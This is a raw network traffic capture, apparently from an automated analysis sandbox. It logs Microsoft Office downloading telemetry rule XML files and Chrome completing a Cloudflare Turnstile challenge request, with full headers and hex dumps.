                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            130192.168.2.54985413.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1427
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                            ETag: "0x8DC582BE56F6873"
                                                                                                                                                            x-ms-request-id: 08bf7a15-f01e-0020-7706-17956b000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48f7nlxc7n5fnfzh00000000420000000007t80
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            131192.168.2.54985513.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1401
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                            ETag: "0x8DC582BE2A9D541"
                                                                                                                                                            x-ms-request-id: b6fa471e-401e-0067-43e5-1609c2000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd4824mj9d6vp65b6n400000004ng0000000064u2
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            132192.168.2.54985713.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1364
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                            ETag: "0x8DC582BEB6AD293"
                                                                                                                                                            x-ms-request-id: 77012b0e-b01e-0097-0bff-164f33000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd4824mj9d6vp65b6n400000004kg00000000ctrf
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            133192.168.2.54985913.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1354
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                            ETag: "0x8DC582BE0662D7C"
                                                                                                                                                            x-ms-request-id: d4fd285a-d01e-005a-06ed-167fd9000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48qjg85buwfdynm5w00000004k0000000002vkt
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            134192.168.2.54986013.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1403
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                            ETag: "0x8DC582BDCDD6400"
                                                                                                                                                            x-ms-request-id: 4d5cca78-701e-0021-6ae5-163d45000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48jwrqbupe3ktsx9w00000004kg00000000dv5p
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            135192.168.2.54985813.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1391
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                            ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                            x-ms-request-id: a18d9b1d-601e-0002-1f03-17a786000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48qjg85buwfdynm5w00000004g0000000009eqr
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                            136192.168.2.54986113.107.246.60443
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:09 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                            2024-10-08 03:09:09 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:09 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 1366
                                                                                                                                                            Connection: close
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                            ETag: "0x8DC582BDF1E2608"
                                                                                                                                                            x-ms-request-id: c9f5ea47-201e-0071-33fe-16ff15000000
                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                            x-azure-ref: 20241008T030909Z-1657d5bbd48qjg85buwfdynm5w00000004fg00000000c0mw
                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2024-10-08 03:09:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            137192.168.2.549862104.18.94.414434124C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-10-08 03:09:10 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1
                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Content-Length: 33871
                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                            Content-type: application/x-www-form-urlencoded
                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                            CF-Challenge: 91fa21b380c2c82
                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                            Accept: */*
                                                                                                                                                            Origin: https://challenges.cloudflare.com
                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jm7z9/0x4AAAAAAAkfshsNV9pF8gSH/auto/fbE/normal/auto/
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            2024-10-08 03:09:10 UTC16384OUTData Raw: 76 5f 38 63 66 32 65 64 39 61 36 63 32 36 34 31 64 65 3d 2d 58 52 51 73 74 42 53 39 4d 39 78 67 4b 70 24 49 24 36 4d 52 74 74 42 43 24 6c 51 4e 66 42 70 71 42 48 24 5a 66 78 47 42 6a 24 4d 66 42 57 42 4e 24 67 50 66 55 24 42 39 6b 69 42 65 24 6f 66 62 56 64 24 55 54 6e 42 72 24 4d 67 42 54 5a 45 66 55 35 24 6a 51 51 78 47 38 31 6e 42 47 24 34 51 74 57 24 58 71 71 35 74 24 61 24 24 67 36 24 4a 6c 6c 24 43 4e 71 47 35 4d 36 4c 49 51 24 6c 55 73 24 4c 6a 42 62 39 24 34 6b 42 66 50 24 36 66 42 32 24 42 53 48 31 75 45 33 77 32 57 24 55 66 6b 38 6f 6f 78 66 6d 55 35 24 74 68 6a 38 6e 4e 65 51 38 6b 5a 39 51 4b 71 58 36 57 5a 45 24 24 53 24 6e 6c 74 50 6b 63 55 6d 53 51 79 50 34 52 48 53 51 61 51 24 68 6f 4d 4d 71 6f 31 31 4f 39 31 53 50 44 35 50 24 36 4d 44 51
                                                                                                                                                            Data Ascii: v_8cf2ed9a6c2641de=-XRQstBS9M9xgKp$I$6MRttBC$lQNfBpqBH$ZfxGBj$MfBWBN$gPfU$B9kiBe$ofbVd$UTnBr$MgBTZEfU5$jQQxG81nBG$4QtW$Xqq5t$a$$g6$Jll$CNqG5M6LIQ$lUs$LjBb9$4kBfP$6fB2$BSH1uE3w2W$Ufk8ooxfmU5$thj8nNeQ8kZ9QKqX6WZE$$S$nltPkcUmSQyP4RHSQaQ$hoMMqo11O91SPD5P$6MDQ
                                                                                                                                                            2024-10-08 03:09:10 UTC16384OUTData Raw: 51 42 59 58 61 6e 6b 66 55 6e 78 6c 78 46 55 6a 57 67 51 36 33 66 33 48 56 78 4f 24 52 24 72 24 78 52 24 4b 58 78 24 66 69 24 36 24 57 51 74 70 24 4d 24 62 6e 24 4a 24 45 24 4b 6e 78 6c 24 4f 24 78 24 78 67 6c 46 24 24 52 24 63 24 52 24 36 52 78 34 6e 45 24 4e 52 24 4d 24 49 51 74 24 42 64 24 4a 51 4e 39 42 6e 24 67 24 4b 54 48 44 24 65 51 2d 67 42 6e 24 5a 51 74 24 24 30 24 73 51 24 51 42 73 51 52 79 6a 4e 78 6b 66 4b 24 62 65 35 6c 24 47 24 2d 39 78 48 41 31 57 62 44 74 74 24 4a 58 74 49 24 2b 51 4b 24 62 44 42 45 51 67 51 24 67 24 62 24 73 30 52 39 42 39 6e 71 4d 78 5a 74 46 6c 31 24 52 65 74 53 42 59 24 34 66 4b 45 51 24 51 70 52 57 35 42 67 51 67 46 74 69 42 6c 51 42 66 6a 53 42 72 24 5a 52 78 30 42 51 51 53 52 4b 69 24 39 51 49 52 62 64 42 6c 51 6b
                                                                                                                                                            Data Ascii: QBYXankfUnxlxFUjWgQ63f3HVxO$R$r$xR$KXx$fi$6$WQtp$M$bn$J$E$Knxl$O$x$xglF$$R$c$R$6Rx4nE$NR$M$IQt$Bd$JQN9Bn$g$KTHD$eQ-gBn$ZQt$$0$sQ$QBsQRyjNxkfK$be5l$G$-9xHA1WbDtt$JXtI$+QK$bDBEQgQ$g$b$s0R9B9nqMxZtFl1$RetSBY$4fKEQ$QpRW5BgQgFtiBlQBfjSBr$ZRx0BQQSRKi$9QIRbdBlQk
                                                                                                                                                            2024-10-08 03:09:10 UTC1103OUTData Raw: 74 49 61 43 6e 6a 36 74 74 24 75 24 67 72 6a 57 43 47 4f 6c 65 74 62 24 4c 5a 4b 66 24 73 2b 6c 4a 68 46 6e 75 50 49 33 75 34 53 30 42 43 57 76 62 71 4c 5a 52 79 6a 78 57 46 48 4d 6e 74 52 24 59 42 56 2d 48 67 61 49 75 51 39 6c 6e 62 42 50 31 57 4e 54 56 63 59 76 56 33 42 2d 66 50 64 55 2b 6e 78 79 6e 24 4a 67 66 36 41 59 45 66 78 58 4b 48 2b 62 77 71 51 79 51 73 67 47 2d 53 6f 77 55 79 30 4a 45 2b 6b 59 54 56 63 54 4f 2b 6b 31 6a 77 69 78 24 59 6a 30 43 4b 46 48 2b 36 41 50 65 55 5a 4f 58 4f 4c 54 58 33 45 69 41 50 54 5a 42 50 46 64 31 74 71 30 24 38 34 43 55 54 6f 4b 6e 24 6f 51 6a 74 4c 39 75 75 4d 65 62 24 47 44 4d 67 74 4d 24 5a 4e 65 46 79 4f 41 63 55 31 4d 4a 53 39 50 24 6a 39 6f 52 70 31 67 42 41 56 47 6f 33 67 6a 74 74 39 65 38 69 2b 57 6c 62 24
                                                                                                                                                            Data Ascii: tIaCnj6tt$u$grjWCGOletb$LZKf$s+lJhFnuPI3u4S0BCWvbqLZRyjxWFHMntR$YBV-HgaIuQ9lnbBP1WNTVcYvV3B-fPdU+nxyn$Jgf6AYEfxXKH+bwqQyQsgG-SowUy0JE+kYTVcTO+k1jwix$Yj0CKFH+6APeUZOXOLTX3EiAPTZBPFd1tq0$84CUToKn$oQjtL9uuMeb$GDMgtM$ZNeFyOAcU1MJS9P$j9oRp1gBAVGo3gjtt9e8i+Wlb$
                                                                                                                                                            2024-10-08 03:09:10 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 08 Oct 2024 03:09:10 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Content-Length: 4552
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-chl-out: gd+3QSahhehi3EduaV8u4oxc680qY2D9qk5qowlOYpNU2jG81ncDdhuUP0mQHM/ugorEWb2gUS1enDdyaF0hClftOU8JXhD6QGFIpi8FbJA8/J42ETFYJS0=$2FT4PgbR/FHVEOyC
